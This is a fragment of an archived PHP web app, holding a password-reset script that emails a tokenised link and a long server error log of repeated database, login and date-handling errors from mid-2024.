send_reset_link.php000064400000003556151676701240010447 0ustar00load(); //set base url $base_url = $_ENV['BASE_URL']; require_once 'emailUtils.php'; require_once '../Classes/Database.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email = $_POST['email']; $db = new Database(); // Check if email exists in the database $db->query('SELECT id, email FROM users WHERE email = :email'); $db->bind(':email', $email); $user = $db->single(); if ($user) { // Generate unique token $token = bin2hex(random_bytes(50)); $expiry = date("Y-m-d H:i:s", strtotime('+1 hour')); // Save token and expiry in the database $db->query('INSERT INTO password_resets (user_id, token, expires_at) VALUES (:user_id, :token, :expires_at)'); $db->bind(':user_id', $user->id); $db->bind(':token', $token); $db->bind(':expires_at', $expiry); $db->execute(); // Prepare email details $resetLink = $base_url."/pages/reset-password.php?token=" . $token; $template = 'email_templates/password_reset_template.html'; $placeholders = [ "Recipient's Name" => $user->email, 'Reset Password Link' => $resetLink, 'expiration time, e.g., 24 hours' => '24 hours', 'Your Name' => 'Your Name', 'Your Position' => 'Your Position', 'Your Company' => 'Your Company', 'Your Contact Information' => 'Your Contact Information' ]; // Call the sendEmail function $result = sendEmail($email, 'Reset Your Password', '', true, $template, $placeholders); echo $result; } else { echo "Email not found"; } } else { echo "Invalid request"; } ?> error_log000064400002200156151676701240006500 0ustar00[29-Jun-2024 04:40:01 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:08 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:10 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:12 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:32 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:56 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:57 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:41:01 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:44:16 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:44:39 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:45:18 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:46:56 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:47:58 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:48:10 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:55:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:56:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:56:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:57:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:58:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:13:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:25:49 UTC] PHP Fatal error: Uncaught Error: Undefined constant PHPMailer\PHPMailer\PHPMailer::DEBUG_SERVER in /home/ftmgc76wdee4/public_html/pages/emailUtils.php:26 Stack trace: #0 /home/ftmgc76wdee4/public_html/pages/send_reset_link.php(51): sendEmail() #1 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emailUtils.php on line 26 [29-Jun-2024 06:44:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:48:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 07:08:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 08:31:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 09:37:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 09:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:13:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:14:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:19:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:22:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:23:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:23:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:24:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:25:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:29:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:31:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 11:37:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:10:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:37:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:56:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 14:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 02:34:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 02:58:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 03:13:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 03:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 07:57:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:02:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 11:20:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 14:29:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:15:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:24:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:28:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:00:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:37:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:51:05 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:51:05 UTC] PHP Fatal error: Uncaught Error: Call to a member function getTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:54:42 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:54:42 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:07 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:07 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:08 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:08 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:10 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:10 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:11 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:11 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:15 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:15 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:16 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:16 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:28 UTC] PHP Fatal error: Uncaught Error: Object of class DateTimeZone could not be converted to string in /home/ftmgc76wdee4/public_html/pages/taskform.php:178 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 178 [01-Jul-2024 00:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 01:29:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 02:05:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 03:07:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:19:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:35:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:03:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:04:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:08:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:09:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:10:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:11:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:21:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:22:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:32:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:32:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:36:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:36:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:37:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:44:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:46:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:47:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:47:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:49:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:51:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:53:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:58:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 08:21:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 12:31:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 23:24:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:37:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:57:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 01:32:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:02:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:03:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:21:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:50:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:03:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:04:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:45:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:47:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:53:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:55:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:05:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:07:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:08:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 05:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 06:02:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 06:27:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 07:04:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 07:19:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 09:56:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:43:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:48:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:49:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 22:30:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 23:14:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 